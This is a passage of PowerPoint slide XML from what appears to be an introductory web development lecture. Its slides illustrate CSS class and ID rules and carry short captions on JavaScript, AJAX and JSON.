          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1323874" y="2010489"/>
            <a:ext cx="6496253" cy="2837022"/>
            <a:chOff x="938069" y="1869251"/>
            <a:chExt cx="6496253" cy="2837022"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE26D241-BAF0-4E37-BC14-9A5A61495FEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257905" y="2397949"/>
              <a:ext cx="5176417" cy="2308324"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>subtitle {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  font-size: 24px;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  color: tomato;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>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ED9C7D60-9F1B-4E41-9AD9-9EA92F4236CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2667000" y="1869251"/>
              <a:ext cx="1710725" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CLASS NAME</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43488C70-1497-40A6-85F7-00A72AEB5C33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="3425225" y="1562100"/>
              <a:ext cx="228600" cy="1676400"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="63A8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CBC50C-F5B6-48BD-AE8C-B39EC7FE6760}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="2971800"/>
              <a:ext cx="381000" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="F75B4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E7B9779-F1FD-49B2-9614-69A0DB7F1037}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="938069" y="3258234"/>
              <a:ext cx="966931" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CSS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>RULES</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3512835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AB4783-1283-404E-AA79-2652C67885F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="653854"/>
            <a:ext cx="9372600" cy="574694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31631F-74FC-4EDC-ADCB-D23701ACC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anatomy of an ID Rule</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234EF9C9-681A-44FA-9FA8-1D2AD9ABFDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1323874" y="2057905"/>
            <a:ext cx="6496253" cy="2789606"/>
            <a:chOff x="938069" y="1916667"/>
            <a:chExt cx="6496253" cy="2789606"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE26D241-BAF0-4E37-BC14-9A5A61495FEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257905" y="2397949"/>
              <a:ext cx="5176417" cy="2308324"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>subtitle {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  font-size: 24px;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  color: tomato;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>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ED9C7D60-9F1B-4E41-9AD9-9EA92F4236CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2959879" y="1916667"/>
              <a:ext cx="1159292" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ID NAME</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43488C70-1497-40A6-85F7-00A72AEB5C33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="3425225" y="1562100"/>
              <a:ext cx="228600" cy="1676400"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="63A81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86CBC50C-F5B6-48BD-AE8C-B39EC7FE6760}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="2971800"/>
              <a:ext cx="381000" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="F75B4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E7B9779-F1FD-49B2-9614-69A0DB7F1037}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="938069" y="3258234"/>
              <a:ext cx="966931" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CSS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>RULES</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3342356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44AF24-ACAF-40A1-8BD7-EC661EDF2BF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="-76200"/>
            <a:ext cx="9372600" cy="6477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0D86C9E-1E6A-4F60-AE33-8F89BAE16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4885508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C53D65-E23B-4F12-959C-2A8BC378D8F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187627" y="5334000"/>
            <a:ext cx="8768747" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript adds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="63A814"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="63A814"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interactivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="834178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55DBA99-FFEC-426E-BF69-64D26F409FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="-76200"/>
            <a:ext cx="9372600" cy="6477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9B3A581-7742-4682-8CDC-DBFFF373A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99" y="2590800"/>
            <a:ext cx="2143125" cy="2143125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{024A13EA-9133-484A-8D27-20BFB8009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8447" y="2590800"/>
            <a:ext cx="2143125" cy="2143125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2437C63C-1D40-4E12-AD2B-06E03EABD6E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="1981200"/>
            <a:ext cx="1290637" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="66675">
            <a:solidFill>
              <a:srgbClr val="1486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76CEC2-5F3C-44F3-BE49-A168F6EA6C70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2362201" y="2209801"/>
            <a:ext cx="1290637" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="66675">
            <a:solidFill>
              <a:srgbClr val="1486C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599FEB3-038A-4034-AF11-31E321EB73B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5414962" y="1981200"/>
            <a:ext cx="1290638" cy="1143001"/>
            <a:chOff x="5376862" y="2676525"/>
            <a:chExt cx="1290638" cy="1143001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Arrow Connector 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A4EDC4B-4AE9-405C-901A-8E9B317E5063}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5376862" y="2676525"/>
              <a:ext cx="1290637" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="66675">
              <a:solidFill>
                <a:srgbClr val="1486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08F2FDD-5185-421F-89E6-AC57FDF37FCC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="5376863" y="2905126"/>
              <a:ext cx="1290637" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="66675">
              <a:solidFill>
                <a:srgbClr val="1486C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553B704-4454-46F4-9F4A-E3E30413AE8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186024" y="5257800"/>
            <a:ext cx="8771953" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="63A814"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AJAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="63A814"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Networking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from the Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C53C77F-D55C-44B9-A48F-2E14734F9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063" y="290624"/>
            <a:ext cx="2809874" cy="2809874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="531013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D161ED-6E55-4E60-9296-DB7918AE166C}"/>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CF16268-F776-43AA-BD09-77D355802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72" y="0"/>
            <a:ext cx="9358545" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FCDC2B2-C986-444B-8674-55B297384B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1794958" y="5449669"/>
            <a:ext cx="5554085" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Welcome to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WWWeb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F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22303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F28679-FE6D-4AFE-AA4A-96BB1BD2B00D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="-76200"/>
            <a:ext cx="9372600" cy="6477000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1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53B704-4454-46F4-9F4A-E3E30413AE8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73813" y="5435025"/>
            <a:ext cx="8996374" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="63A814"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facilitates client-server communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5159B2DD-3C62-4E45-8BDD-3CD23DD90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570" y="227254"/>
            <a:ext cx="6644860" cy="4573346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2534532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9B02-7484-4B51-8C5F-0CA9AA1034AD}"/>
              </a:ext>
